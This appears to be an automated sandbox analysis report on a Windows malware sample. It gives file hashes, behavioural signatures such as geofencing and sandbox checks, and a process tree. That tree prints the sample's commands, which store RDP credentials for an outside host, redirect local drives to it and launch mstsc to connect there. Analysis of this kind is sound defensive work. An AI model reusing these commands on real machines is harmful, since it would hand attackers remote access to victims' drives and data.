Analysis

  • max time kernel
    93s
  • max time network
    95s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    19/11/2024, 19:30

General

  • Target

    ec18438e11d9d6f16ace03083b1ab1da390b239fe546c7b7ea90b662c6353842.exe

  • Size

    360KB

  • MD5

    97f227d150f83ef61cb4024997c6221b

  • SHA1

    ea2351466bf6211e81b794c5bc81f136d5579910

  • SHA256

    ec18438e11d9d6f16ace03083b1ab1da390b239fe546c7b7ea90b662c6353842

  • SHA512

    d21341b2dc5ec00fc61e6850b0448b5e270380f9292dca7bed226cada0c5f115a8d3300d1aaa370c572676ee320aa6038dee1914660b37e7593b3150b256b37a

  • SSDEEP

    6144:7ldk1cWQRNTBzGWGP7J/peuA2WguS8if1DAtZoXdc7JCwufTrX:7cv0NT5xg/peuPxOs1DqdifT7

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely a geofence check.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ec18438e11d9d6f16ace03083b1ab1da390b239fe546c7b7ea90b662c6353842.exe
    "C:\Users\Admin\AppData\Local\Temp\ec18438e11d9d6f16ace03083b1ab1da390b239fe546c7b7ea90b662c6353842.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3960
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\72FD.tmp\72FE.tmp\72FF.bat C:\Users\Admin\AppData\Local\Temp\ec18438e11d9d6f16ace03083b1ab1da390b239fe546c7b7ea90b662c6353842.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4992
      • C:\Windows\system32\PING.EXE
        ping 127.0.0.1 -n 1
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:4304
      • C:\Windows\system32\cmdkey.exe
        cmdkey /del:TERMSRV/cs.igst.vip
        3⤵
        PID:2424
      • C:\Windows\system32\cmdkey.exe
        cmdkey /add:TERMSRV/cs.igst.vip /user:cs.igst.vip\wxwyuser /pass:qaf~dx@wR2xo82
        3⤵
        PID:2932
      • C:\Windows\system32\reg.exe
        Reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\LocalDevices" /v cs.igst.vip /t REG_DWORD /d "77" /f
        3⤵
        PID:4676
      • C:\Windows\system32\PING.EXE
        ping 127.0.0.1 -n 2
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:1784
      • C:\Windows\system32\mstsc.exe
        mstsc "C:\Users\Admin\AppData\Roaming\borlndmm.dll" /v cs.igst.vip:2006 /f
        3⤵
        PID:5008
      • C:\Windows\system32\PING.EXE
        ping 127.0.0.1 -n 4
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:4024
  • C:\Windows\System32\mstsc.exe
    C:\Windows\System32\mstsc.exe -Embedding
    1⤵
    • Enumerates connected drives
    • Checks SCSI registry key(s)
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:1388

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\72FD.tmp\72FE.tmp\72FF.bat

    Filesize

    51KB

    MD5

    9057894a449b0a756f9184ef29ca93c4

    SHA1

    962509d372d82d946f43196be68cc594bab88863

    SHA256

    f7f9feeced9c1247410f5de421287b5039ae8cb6a81dcc74347e1ba6227778a1

    SHA512

    937e22d660f73759ac64ecf36641a2555df4dad40716e9b558368ccd4bcf65f8a7a59e30e64aeea7d421bcc5c8f24fc2a3899b12a2af6308ad0366bc1afcd8b5

  • C:\Users\Admin\AppData\Roaming\borlndmm.dll

    Filesize

    223B

    MD5

    acd130fcd6ead7933d4115449320c0b3

    SHA1

    9f71de7ad69627bfa6f38d36c284ff3173c28f4f

    SHA256

    d48defd27e3e82b585164b83970a91727b7b26db40bc500a509fb262b2acbf12

    SHA512

    d8d9ce74e24c8de9cc119f92354da7fefcc796201e15ea983428492c7593909e3809a64a94c0c7ebc2ffda33339ea3e83f1b3e03ba5fac0595c10c71d775d6ca